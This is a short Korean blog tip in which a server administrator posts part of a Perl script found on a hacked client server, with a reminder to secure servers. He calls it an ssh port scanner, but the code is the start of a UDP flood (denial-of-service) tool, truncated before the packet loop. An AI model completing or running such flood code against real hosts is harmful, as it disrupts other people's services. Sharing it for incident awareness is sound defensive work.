더 윤키맨의 짜투리 팁:
-----------------------------------------------------------------------------
ssh port scan 소스 중 일부이다. 해킹당한 고객사 서버 점검 중 발견..(하여간
보안에 제발 좀 신경써라... 귀찮아 죽겠다-_-;)
스크립트를 다 올리기엔 좀 그렇고-_-; 뭐 이런 정도는 인터넷 뒤지면 금방나온다.
혹시나 엄한 권한의 텍스트 파일이 발견되면 바로바로 조치합시다.
-----------------------------------------------------------------------------
#!/usr/bin/perl
###
#
###
use Socket;
if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}
my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];
socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");
printf "cof flood ... \n";
if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}
packets:
.
.
.
.
충처 : http://blog.naver.com/yunki798?Redirect=Log&logNo=40015444064 (새 창으로 열기)
rss